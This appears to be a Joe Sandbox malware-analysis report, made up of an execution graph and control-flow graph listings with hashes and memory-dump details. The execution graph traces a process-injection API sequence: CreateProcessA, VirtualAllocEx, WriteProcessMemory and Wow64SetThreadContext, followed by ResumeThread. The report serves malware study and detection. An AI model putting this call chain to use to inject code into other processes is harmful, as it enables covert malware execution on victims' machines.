                                                  execution_graph 47290 73b2a1e 47291 73b29ac 47290->47291 47293 73b2a21 47290->47293 47292 73b29da 47291->47292 47304 73b326f 47291->47304 47309 73b3649 47291->47309 47314 73b2f1a 47291->47314 47319 73b3184 47291->47319 47324 73b3004 47291->47324 47329 73b2e95 47291->47329 47333 73b30e7 47291->47333 47337 73b3750 47291->47337 47341 73b3171 47291->47341 47346 73b2f9e 47291->47346 47305 73b3274 47304->47305 47350 73b17e9 47305->47350 47354 73b17f0 47305->47354 47306 73b328e 47306->47292 47310 73b319b 47309->47310 47311 73b31b0 47309->47311 47358 73b1738 47310->47358 47362 73b1740 47310->47362 47311->47292 47315 73b346a 47314->47315 47366 73b1a78 47315->47366 47370 73b1a70 47315->47370 47316 73b341f 47316->47292 47320 73b318a 47319->47320 47322 73b1738 ResumeThread 47320->47322 47323 73b1740 ResumeThread 47320->47323 47321 73b31b0 47321->47292 47322->47321 47323->47321 47325 73b30ad 47324->47325 47327 73b17e9 Wow64SetThreadContext 47325->47327 47328 73b17f0 Wow64SetThreadContext 47325->47328 47326 73b30c8 47326->47292 47327->47326 47328->47326 47374 73b1c12 47329->47374 47378 73b1c10 47329->47378 47382 73b1988 47333->47382 47386 73b1980 47333->47386 47334 73b2f65 47390 73b18c8 47337->47390 47394 73b18c0 47337->47394 47338 73b3714 47338->47337 47342 73b317e 47341->47342 47344 73b1988 WriteProcessMemory 47342->47344 47345 73b1980 WriteProcessMemory 47342->47345 47343 73b331f 47343->47292 47344->47343 47345->47343 47348 73b1988 WriteProcessMemory 47346->47348 47349 73b1980 WriteProcessMemory 47346->47349 47347 73b2fd1 47347->47292 47348->47347 47349->47347 47351 73b1835 Wow64SetThreadContext 47350->47351 47353 73b187d 47351->47353 47353->47306 47355 73b1835 Wow64SetThreadContext 47354->47355 47357 73b187d 47355->47357 47357->47306 47359 73b1780 ResumeThread 47358->47359 47361 73b17b1 47359->47361 47361->47311 47363 73b1780 ResumeThread 47362->47363 47365 73b17b1 47363->47365 47365->47311 47367 73b1ac3 ReadProcessMemory 47366->47367 47369 73b1b07 47367->47369 47369->47316 47371 73b1ac3 ReadProcessMemory 47370->47371 47373 73b1b07 47371->47373 47373->47316 47375 73b1c99 47374->47375 47375->47375 47376 73b1dfe CreateProcessA 47375->47376 47377 73b1e5b 47376->47377 47379 73b1c99 CreateProcessA 47378->47379 47381 73b1e5b 47379->47381 47383 73b19d0 WriteProcessMemory 47382->47383 47385 73b1a27 47383->47385 47385->47334 47387 73b19d0 WriteProcessMemory 47386->47387 47389 73b1a27 47387->47389 47389->47334 47391 73b1908 VirtualAllocEx 47390->47391 47393 73b1945 47391->47393 47393->47338 47395 73b18c5 VirtualAllocEx 47394->47395 47397 73b1945 47395->47397 47397->47338 47398 fad01c 47399 fad034 47398->47399 47400 fad08e 47399->47400 47408 51f13bc 47399->47408 47416 51f1080 47399->47416 47425 51f1090 47399->47425 47434 51f1ea0 47399->47434 47438 51f1eb0 47399->47438 47442 51f1434 47399->47442 47450 51f2c08 47399->47450 47410 51f13c5 47408->47410 47409 51f2c79 47468 51f155c 47409->47468 47410->47409 47412 51f2c69 47410->47412 47458 51f2d90 47412->47458 47463 51f2da0 47412->47463 47413 51f2c77 47419 51f1083 47416->47419 47417 51f12e0 47417->47400 47418 51f2c79 47420 51f155c CallWindowProcW 47418->47420 47419->47417 47419->47418 47421 51f2c69 47419->47421 47422 51f2c77 47420->47422 47423 51f2d90 CallWindowProcW 47421->47423 47424 51f2da0 CallWindowProcW 47421->47424 47422->47422 47423->47422 47424->47422 47427 51f1096 47425->47427 47426 51f12e0 47426->47400 47427->47426 47428 51f2c79 47427->47428 47430 51f2c69 47427->47430 47429 51f155c CallWindowProcW 47428->47429 47431 51f2c77 47429->47431 47432 51f2d90 CallWindowProcW 47430->47432 47433 51f2da0 CallWindowProcW 47430->47433 47431->47431 47432->47431 47433->47431 47435 51f1eb0 47434->47435 47436 51f1434 CallWindowProcW 47435->47436 47437 51f1ef7 47436->47437 47437->47400 47439 51f1ed6 47438->47439 47440 51f1434 CallWindowProcW 47439->47440 47441 51f1ef7 47440->47441 47441->47400 47443 51f143f 47442->47443 47444 51f2c79 47443->47444 47446 51f2c69 47443->47446 47445 51f155c CallWindowProcW 47444->47445 47447 51f2c77 47445->47447 47448 51f2d90 CallWindowProcW 47446->47448 47449 51f2da0 CallWindowProcW 47446->47449 47447->47447 47448->47447 47449->47447 47451 51f2c18 47450->47451 47452 51f2c79 47451->47452 47454 51f2c69 47451->47454 47453 51f155c CallWindowProcW 47452->47453 47455 51f2c77 47453->47455 47456 51f2d90 CallWindowProcW 47454->47456 47457 51f2da0 CallWindowProcW 47454->47457 47455->47455 47456->47455 47457->47455 47460 51f2da0 47458->47460 47459 51f2e40 47459->47413 47472 51f2e49 47460->47472 47477 51f2e58 47460->47477 47464 51f2db4 47463->47464 47466 51f2e49 CallWindowProcW 47464->47466 47467 51f2e58 CallWindowProcW 47464->47467 47465 51f2e40 47465->47413 47466->47465 47467->47465 47469 51f1567 47468->47469 47470 51f435a CallWindowProcW 47469->47470 47471 51f4309 47469->47471 47470->47471 47471->47413 47473 51f2e42 47472->47473 47474 51f2e52 47472->47474 47473->47459 47475 51f2e69 47474->47475 47480 51f429b 47474->47480 47475->47459 47478 51f2e69 47477->47478 47479 51f429b CallWindowProcW 47477->47479 47478->47459 47479->47478 47481 51f155c CallWindowProcW 47480->47481 47482 51f42aa 47481->47482 47482->47475 47099 ff4668 47100 ff467a 47099->47100 47101 ff4686 47100->47101 47105 ff4779 47100->47105 47110 ff3e40 47101->47110 47103 ff46a5 47106 ff479d 47105->47106 47114 ff4879 47106->47114 47118 ff4888 47106->47118 47111 ff3e4b 47110->47111 47126 ff5cd0 47111->47126 47113 ff705a 47113->47103 47115 ff4888 47114->47115 47117 ff498c 47115->47117 47122 ff44c4 47115->47122 47120 ff48af 47118->47120 47119 ff498c 47119->47119 47120->47119 47121 ff44c4 CreateActCtxA 47120->47121 47121->47119 47123 ff5918 CreateActCtxA 47122->47123 47125 ff59db 47123->47125 47125->47125 47127 ff5cdb 47126->47127 47130 ff5cf0 47127->47130 47129 ff7105 47129->47113 47131 ff5cfb 47130->47131 47134 ff5d20 47131->47134 47133 ff71e2 47133->47129 47135 ff5d2b 47134->47135 47138 ff5d50 47135->47138 47137 ff72e5 47137->47133 47139 ff5d5b 47138->47139 47141 ff884b 47139->47141 47145 ffaaf0 47139->47145 47140 ff8889 47140->47137 47141->47140 47149 ffcbe1 47141->47149 47154 ffcbf0 47141->47154 47159 ffaf29 47145->47159 47163 ffaf30 47145->47163 47146 ffab06 47146->47141 47150 ffcbf0 47149->47150 47151 ffcc35 47150->47151 47186 ffd1a8 47150->47186 47190 ffd198 47150->47190 47151->47140 47155 ffcc11 47154->47155 47156 ffcc35 47155->47156 47157 ffd1a8 4 API calls 47155->47157 47158 ffd198 4 API calls 47155->47158 47156->47140 47157->47156 47158->47156 47160 ffaf30 47159->47160 47166 ffb028 47160->47166 47161 ffaf3f 47161->47146 47165 ffb028 2 API calls 47163->47165 47164 ffaf3f 47164->47146 47165->47164 47167 ffb039 47166->47167 47168 ffb05c 47166->47168 47167->47168 47174 ffb2b1 47167->47174 47178 ffb2c0 47167->47178 47168->47161 47169 ffb054 47169->47168 47170 ffb260 GetModuleHandleW 47169->47170 47171 ffb28d 47170->47171 47171->47161 47175 ffb2d4 47174->47175 47177 ffb2f9 47175->47177 47182 ffacdc 47175->47182 47177->47169 47179 ffb2d4 47178->47179 47180 ffb2f9 47179->47180 47181 ffacdc LoadLibraryExW 47179->47181 47180->47169 47181->47180 47183 ffb4a0 LoadLibraryExW 47182->47183 47185 ffb519 47183->47185 47185->47177 47187 ffd1b5 47186->47187 47188 ffd1ef 47187->47188 47194 ffcf70 47187->47194 47188->47151 47191 ffd1a8 47190->47191 47192 ffd1ef 47191->47192 47193 ffcf70 4 API calls 47191->47193 47192->47151 47193->47192 47195 ffcf75 47194->47195 47197 ffdb00 47195->47197 47198 ffd09c 47195->47198 47197->47197 47199 ffd0a7 47198->47199 47200 ff5d50 4 API calls 47199->47200 47201 ffdb6f 47200->47201 47205 fff900 47201->47205 47211 fff8e8 47201->47211 47202 ffdba9 47202->47197 47206 fff931 47205->47206 47208 fffa31 47205->47208 47207 fff93d 47206->47207 47209 51f09b4 CreateWindowExW CallWindowProcW 47206->47209 47210 51f09c0 CreateWindowExW CallWindowProcW 47206->47210 47207->47202 47208->47202 47209->47208 47210->47208 47213 fff900 47211->47213 47212 fff93d 47212->47202 47213->47212 47214 51f09b4 CreateWindowExW CallWindowProcW 47213->47214 47215 51f09c0 CreateWindowExW CallWindowProcW 47213->47215 47214->47212 47215->47212 47089 73b3b70 47090 73b3cfb 47089->47090 47091 73b3b96 47089->47091 47091->47090 47094 73b3de9 47091->47094 47097 73b3df0 PostMessageW 47091->47097 47095 73b3df0 PostMessageW 47094->47095 47096 73b3e5c 47095->47096 47096->47091 47098 73b3e5c 47097->47098 47098->47091 47216 73b6720 47217 73b673e 47216->47217 47218 73b6748 47216->47218 47220 73b6788 47217->47220 47221 73b6796 47220->47221 47224 73b67b5 47220->47224 47225 73b6144 47221->47225 47224->47218 47226 73b6900 FindCloseChangeNotification 47225->47226 47227 73b67b1 47226->47227 47227->47218 47228 524c7f8 47233 ff5d50 4 API calls 47228->47233 47234 ff8543 47228->47234 47241 ff8588 47228->47241 47248 ff5daf 47228->47248 47229 524c80b 47233->47229 47235 ff8546 47234->47235 47237 ff884b 47235->47237 47238 ffaaf0 2 API calls 47235->47238 47236 ff8889 47236->47229 47237->47236 47239 ffcbe1 4 API calls 47237->47239 47240 ffcbf0 4 API calls 47237->47240 47238->47237 47239->47236 47240->47236 47242 ff8598 47241->47242 47244 ff884b 47242->47244 47245 ffaaf0 2 API calls 47242->47245 47243 ff8889 47243->47229 47244->47243 47246 ffcbe1 4 API calls 47244->47246 47247 ffcbf0 4 API calls 47244->47247 47245->47244 47246->47243 47247->47243 47250 ff5d5b 47248->47250 47249 ff5de6 47250->47248 47250->47249 47252 ff884b 47250->47252 47255 ffaaf0 2 API calls 47250->47255 47251 ff8889 47251->47229 47252->47251 47253 ffcbe1 4 API calls 47252->47253 47254 ffcbf0 4 API calls 47252->47254 47253->47251 47254->47251 47255->47252 47256 52444f8 47257 524450f 47256->47257 47260 5243f34 47257->47260 47259 524459a 47261 5243f3f 47260->47261 47264 ff5cf0 4 API calls 47261->47264 47265 ff717a 47261->47265 47262 52446f1 47262->47259 47264->47262 47266 ff7188 47265->47266 47267 ff5d20 4 API calls 47266->47267 47268 ff71e2 47267->47268 47268->47262 47483 5243958 47485 5243983 47483->47485 47486 52428c8 47483->47486 47487 52428d3 47486->47487 47489 ff5daf 4 API calls 47487->47489 47490 ff8588 4 API calls 47487->47490 47491 ff8543 4 API calls 47487->47491 47492 ff5d50 4 API calls 47487->47492 47488 5243a74 47488->47485 47489->47488 47490->47488 47491->47488 47492->47488 47269 51f8f80 47270 51f8fad 47269->47270 47279 51f8c4c 47270->47279 47272 51f905e 47273 51f8c4c 4 API calls 47272->47273 47274 51f90c2 47273->47274 47275 51f8c4c 4 API calls 47274->47275 47276 51f90f4 47275->47276 47277 51f8c4c 4 API calls 47276->47277 47278 51f946a 47277->47278 47280 51f8c57 47279->47280 47283 51f8ecc 47280->47283 47282 51fc5af 47282->47272 47284 51f8ed7 47283->47284 47285 51fc5e2 47284->47285 47286 ff5daf 4 API calls 47284->47286 47287 ff8588 4 API calls 47284->47287 47288 ff8543 4 API calls 47284->47288 47289 ff5d50 4 API calls 47284->47289 47285->47282 47286->47285 47287->47285 47288->47285 47289->47285 47493 ffd2c0 47494 ffd306 47493->47494 47498 ffd491 47494->47498 47502 ffd4a0 47494->47502 47495 ffd3f3 47499 ffd4a0 47498->47499 47505 ffd038 47499->47505 47503 ffd038 DuplicateHandle 47502->47503 47504 ffd4ce 47503->47504 47504->47495 47506 ffd508 DuplicateHandle 47505->47506 47507 ffd4ce 47506->47507 47507->47495

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 524fbc8 1 524fbc9-524fbd0 0->1 1->1 2 524fbd2-524fbf9 1->2 4 524fc00-524fc25 2->4 5 524fbfb 2->5 6 524fc27 4->6 7 524fc2c-524fc38 4->7 5->4 6->7 8 524fc3b 7->8 9 524fc42-524fc5e 8->9 10 524fc67-524fc68 9->10 11 524fc60 9->11 12 524fc6d-524fc8e 10->12 13 524fdda-524fdde 10->13 11->8 11->12 11->13 14 524fd66-524fd70 11->14 15 524fc90-524fc94 11->15 16 524fce0-524fcf5 11->16 17 524fcbd-524fcc0 11->17 18 524fdbe-524fdd5 11->18 19 524fd4a-524fd61 11->19 20 524fcfa-524fd01 11->20 21 524fd9b-524fdb9 11->21 12->9 26 524fd77-524fd96 14->26 27 524fd72 14->27 22 524fc96-524fca5 15->22 23 524fca7-524fcae 15->23 16->9 31 524fcc9-524fcdb 17->31 18->9 19->9 24 524fd03 20->24 25 524fd08-524fd45 20->25 21->9 29 524fcb5-524fcbb 22->29 23->29 24->25 25->9 26->9 27->26 29->9 31->9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187519466.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5240000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7Z/t$RWIK$[[bb
                                                  • API String ID: 0-1157992699
                                                  • Opcode ID: 287335a4034d6647ba4a037c6bb62dcc88f1ae4c42b2301154b57d88987efa9d
                                                  • Instruction ID: 4fba981978e080e320a1e146518bb8ba75063c8453223fe06cbf40206ded1bdc
                                                  • Opcode Fuzzy Hash: 287335a4034d6647ba4a037c6bb62dcc88f1ae4c42b2301154b57d88987efa9d
                                                  • Instruction Fuzzy Hash: F751F775E2460A8FDB08CFAAC5416AEFBF2FF88311F14D46AD419A7254D7348A42CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 32 524fbd8-524fbf9 33 524fc00-524fc25 32->33 34 524fbfb 32->34 35 524fc27 33->35 36 524fc2c-524fc38 33->36 34->33 35->36 37 524fc3b 36->37 38 524fc42-524fc5e 37->38 39 524fc67-524fc68 38->39 40 524fc60 38->40 41 524fc6d-524fc8e 39->41 42 524fdda-524fdde 39->42 40->37 40->41 40->42 43 524fd66-524fd70 40->43 44 524fc90-524fc94 40->44 45 524fce0-524fcf5 40->45 46 524fcbd-524fcc0 40->46 47 524fdbe-524fdd5 40->47 48 524fd4a-524fd61 40->48 49 524fcfa-524fd01 40->49 50 524fd9b-524fdb9 40->50 41->38 55 524fd77-524fd96 43->55 56 524fd72 43->56 51 524fc96-524fca5 44->51 52 524fca7-524fcae 44->52 45->38 60 524fcc9-524fcdb 46->60 47->38 48->38 53 524fd03 49->53 54 524fd08-524fd45 49->54 50->38 58 524fcb5-524fcbb 51->58 52->58 53->54 54->38 55->38 56->55 58->38 60->38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187519466.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5240000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7Z/t$RWIK$[[bb
                                                  • API String ID: 0-1157992699
                                                  • Opcode ID: 7c4a5fbc1187138c3a0461cdc595592c6fa5a602a55683f101352b6a09881879
                                                  • Instruction ID: 9799de724e5a1d64b052e197b890c3105002d23d4f6a6bab40f6f98b7476d692
                                                  • Opcode Fuzzy Hash: 7c4a5fbc1187138c3a0461cdc595592c6fa5a602a55683f101352b6a09881879
                                                  • Instruction Fuzzy Hash: 04510975E2460ACFDB08CFAAC5416AEFBF2FF88301F14D46AD419A7254D7748A428F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tIh
                                                  • API String ID: 0-443931868
                                                  • Opcode ID: 71e842f13322f941e5f0610752f3fe3603e71bbce8b16b091a7e3d1ace7ad7d7
                                                  • Instruction ID: 4ce5442696d983e4d645c0117c7bd5b294b6f59633a6f00382728bccd0ebed6f
                                                  • Opcode Fuzzy Hash: 71e842f13322f941e5f0610752f3fe3603e71bbce8b16b091a7e3d1ace7ad7d7
                                                  • Instruction Fuzzy Hash: 19D127B0D1420AEFCB08CFA5C4858AEFBB6FF8A301F219555D516EB254D734A982CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187519466.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5240000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1159613a3fee2d286205da10324c1eb8bf096525465d7f0cc4cd37c05347efaf
                                                  • Instruction ID: 2628708a012514071f88544deec9aa0d77d61d0db166b16288f104e45abfd5d2
                                                  • Opcode Fuzzy Hash: 1159613a3fee2d286205da10324c1eb8bf096525465d7f0cc4cd37c05347efaf
                                                  • Instruction Fuzzy Hash: 9D526F34A10315CFDB14DF28C844B99B7B2FF89314F2582A9D5586F3A2DB71A986CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187519466.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5240000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02b78d89960d6ce73c9bbe0f7d26b230855d6bae53e76dfc112073498ac1acc1
                                                  • Instruction ID: 77b595a34be8debcb118dc9a0548bc704d7a0d8cc6a098daafd093c8a11a9d54
                                                  • Opcode Fuzzy Hash: 02b78d89960d6ce73c9bbe0f7d26b230855d6bae53e76dfc112073498ac1acc1
                                                  • Instruction Fuzzy Hash: 25527F34A00355CFDB14DF28C844B99B7B2FF86314F2582A9D5586F3A2DB71A986CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac70420a4347cda7babdc5cd00f007ae94dcc285d5a52da0d6698bb03e8a02bf
                                                  • Instruction ID: 25ea8b0a4b8989f3340fee185b0900613cd576c0cfb05084688df1e43dba6f76
                                                  • Opcode Fuzzy Hash: ac70420a4347cda7babdc5cd00f007ae94dcc285d5a52da0d6698bb03e8a02bf
                                                  • Instruction Fuzzy Hash: A321ECB1E006589BEB18CFABD9442DEFBF7AFC8310F14C17AD508A6258DB701945CA50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1372 71417d0-71417ee 1373 71417f5-71417fd call 71418c8 1372->1373 1374 71417f0 1372->1374 1375 7141803 1373->1375 1374->1373 1376 714180a-7141826 1375->1376 1377 714182f-7141830 1376->1377 1378 7141828 1376->1378 1381 714189d-71418a1 1377->1381 1378->1375 1378->1377 1379 7141876-7141898 1378->1379 1380 7141832-7141846 1378->1380 1378->1381 1379->1376 1383 7141848-7141857 1380->1383 1384 7141859-7141860 1380->1384 1385 7141867-7141874 1383->1385 1384->1385 1385->1376
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3H5$3H5
                                                  • API String ID: 0-2752242361
                                                  • Opcode ID: b02eb0ab859288398d1f478d42f20678142ee08518e93f25b10fb766c2b2c4ed
                                                  • Instruction ID: 13a6d6384da843d748bf35836141579326f6814af6855ee835c1ee0070bd90b6
                                                  • Opcode Fuzzy Hash: b02eb0ab859288398d1f478d42f20678142ee08518e93f25b10fb766c2b2c4ed
                                                  • Instruction Fuzzy Hash: E7211BB0D1020AEFDB48CFA9C5416AEFBF5FF89300F14C569D508A7254E7309A85DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1387 73b1c10-73b1ca5 1389 73b1cde-73b1cfe 1387->1389 1390 73b1ca7-73b1cb1 1387->1390 1397 73b1d00-73b1d0a 1389->1397 1398 73b1d37-73b1d66 1389->1398 1390->1389 1391 73b1cb3-73b1cb5 1390->1391 1392 73b1cd8-73b1cdb 1391->1392 1393 73b1cb7-73b1cc1 1391->1393 1392->1389 1395 73b1cc3 1393->1395 1396 73b1cc5-73b1cd4 1393->1396 1395->1396 1396->1396 1400 73b1cd6 1396->1400 1397->1398 1399 73b1d0c-73b1d0e 1397->1399 1406 73b1d68-73b1d72 1398->1406 1407 73b1d9f-73b1e59 CreateProcessA 1398->1407 1401 73b1d31-73b1d34 1399->1401 1402 73b1d10-73b1d1a 1399->1402 1400->1392 1401->1398 1404 73b1d1e-73b1d2d 1402->1404 1405 73b1d1c 1402->1405 1404->1404 1408 73b1d2f 1404->1408 1405->1404 1406->1407 1409 73b1d74-73b1d76 1406->1409 1418 73b1e5b-73b1e61 1407->1418 1419 73b1e62-73b1ee8 1407->1419 1408->1401 1411 73b1d99-73b1d9c 1409->1411 1412 73b1d78-73b1d82 1409->1412 1411->1407 1413 73b1d86-73b1d95 1412->1413 1414 73b1d84 1412->1414 1413->1413 1416 73b1d97 1413->1416 1414->1413 1416->1411 1418->1419 1429 73b1eea-73b1eee 1419->1429 1430 73b1ef8-73b1efc 1419->1430 1429->1430 1431 73b1ef0 1429->1431 1432 73b1efe-73b1f02 1430->1432 1433 73b1f0c-73b1f10 1430->1433 1431->1430 1432->1433 1434 73b1f04 1432->1434 1435 73b1f12-73b1f16 1433->1435 1436 73b1f20-73b1f24 1433->1436 1434->1433 1435->1436 1439 73b1f18 1435->1439 1437 73b1f36-73b1f3d 1436->1437 1438 73b1f26-73b1f2c 1436->1438 1440 73b1f3f-73b1f4e 1437->1440 1441 73b1f54 1437->1441 1438->1437 1439->1436 1440->1441 1443 73b1f55 1441->1443 1443->1443
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B1E46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 65237709013684ced899b6cb9a9fcc368f55ee9febe840c3b6f7aaf7d23fcdf4
                                                  • Instruction ID: 52d82341c1f0c5a2f46041d9c24b2f7f5bfd6c33c9ed568dd984805f6e06b872
                                                  • Opcode Fuzzy Hash: 65237709013684ced899b6cb9a9fcc368f55ee9febe840c3b6f7aaf7d23fcdf4
                                                  • Instruction Fuzzy Hash: DE915BB1D0021ECFEB20CFA8C851BEDBBB2BF49310F148569E948A7640DB759985CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1444 73b1c12-73b1ca5 1446 73b1cde-73b1cfe 1444->1446 1447 73b1ca7-73b1cb1 1444->1447 1454 73b1d00-73b1d0a 1446->1454 1455 73b1d37-73b1d66 1446->1455 1447->1446 1448 73b1cb3-73b1cb5 1447->1448 1449 73b1cd8-73b1cdb 1448->1449 1450 73b1cb7-73b1cc1 1448->1450 1449->1446 1452 73b1cc3 1450->1452 1453 73b1cc5-73b1cd4 1450->1453 1452->1453 1453->1453 1457 73b1cd6 1453->1457 1454->1455 1456 73b1d0c-73b1d0e 1454->1456 1463 73b1d68-73b1d72 1455->1463 1464 73b1d9f-73b1e59 CreateProcessA 1455->1464 1458 73b1d31-73b1d34 1456->1458 1459 73b1d10-73b1d1a 1456->1459 1457->1449 1458->1455 1461 73b1d1e-73b1d2d 1459->1461 1462 73b1d1c 1459->1462 1461->1461 1465 73b1d2f 1461->1465 1462->1461 1463->1464 1466 73b1d74-73b1d76 1463->1466 1475 73b1e5b-73b1e61 1464->1475 1476 73b1e62-73b1ee8 1464->1476 1465->1458 1468 73b1d99-73b1d9c 1466->1468 1469 73b1d78-73b1d82 1466->1469 1468->1464 1470 73b1d86-73b1d95 1469->1470 1471 73b1d84 1469->1471 1470->1470 1473 73b1d97 1470->1473 1471->1470 1473->1468 1475->1476 1486 73b1eea-73b1eee 1476->1486 1487 73b1ef8-73b1efc 1476->1487 1486->1487 1488 73b1ef0 1486->1488 1489 73b1efe-73b1f02 1487->1489 1490 73b1f0c-73b1f10 1487->1490 1488->1487 1489->1490 1491 73b1f04 1489->1491 1492 73b1f12-73b1f16 1490->1492 1493 73b1f20-73b1f24 1490->1493 1491->1490 1492->1493 1496 73b1f18 1492->1496 1494 73b1f36-73b1f3d 1493->1494 1495 73b1f26-73b1f2c 1493->1495 1497 73b1f3f-73b1f4e 1494->1497 1498 73b1f54 1494->1498 1495->1494 1496->1493 1497->1498 1500 73b1f55 1498->1500 1500->1500
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B1E46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 7f2057f53716f7f0a7550f7e05c4345c7dcecdb018b6233c24eea2dbcb93ba3a
                                                  • Instruction ID: 219a4af891de9d6a976c7c30bb3223178a361de6f8db30f6acf391cc32f00355
                                                  • Opcode Fuzzy Hash: 7f2057f53716f7f0a7550f7e05c4345c7dcecdb018b6233c24eea2dbcb93ba3a
                                                  • Instruction Fuzzy Hash: 37915AB1D0021ECFEB20CFA8C851BEDBBB2BF49310F148569E948A7640DB759985CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1501 ffb028-ffb037 1502 ffb039-ffb046 call ff9a94 1501->1502 1503 ffb063-ffb067 1501->1503 1510 ffb05c 1502->1510 1511 ffb048 1502->1511 1505 ffb07b-ffb0bc 1503->1505 1506 ffb069-ffb073 1503->1506 1512 ffb0be-ffb0c6 1505->1512 1513 ffb0c9-ffb0d7 1505->1513 1506->1505 1510->1503 1557 ffb04e call ffb2b1 1511->1557 1558 ffb04e call ffb2c0 1511->1558 1512->1513 1514 ffb0fb-ffb0fd 1513->1514 1515 ffb0d9-ffb0de 1513->1515 1520 ffb100-ffb107 1514->1520 1517 ffb0e9 1515->1517 1518 ffb0e0-ffb0e7 call ffac90 1515->1518 1516 ffb054-ffb056 1516->1510 1519 ffb198-ffb258 1516->1519 1524 ffb0eb-ffb0f9 1517->1524 1518->1524 1552 ffb25a-ffb25d 1519->1552 1553 ffb260-ffb28b GetModuleHandleW 1519->1553 1521 ffb109-ffb111 1520->1521 1522 ffb114-ffb11b 1520->1522 1521->1522 1525 ffb11d-ffb125 1522->1525 1526 ffb128-ffb131 call ffaca0 1522->1526 1524->1520 1525->1526 1532 ffb13e-ffb143 1526->1532 1533 ffb133-ffb13b 1526->1533 1534 ffb145-ffb14c 1532->1534 1535 ffb161-ffb16e 1532->1535 1533->1532 1534->1535 1537 ffb14e-ffb15e call ffacb0 call ffacc0 1534->1537 1541 ffb191-ffb197 1535->1541 1542 ffb170-ffb18e 1535->1542 1537->1535 1542->1541 1552->1553 1554 ffb28d-ffb293 1553->1554 1555 ffb294-ffb2a8 1553->1555 1554->1555 1557->1516 1558->1516
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00FFB27E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
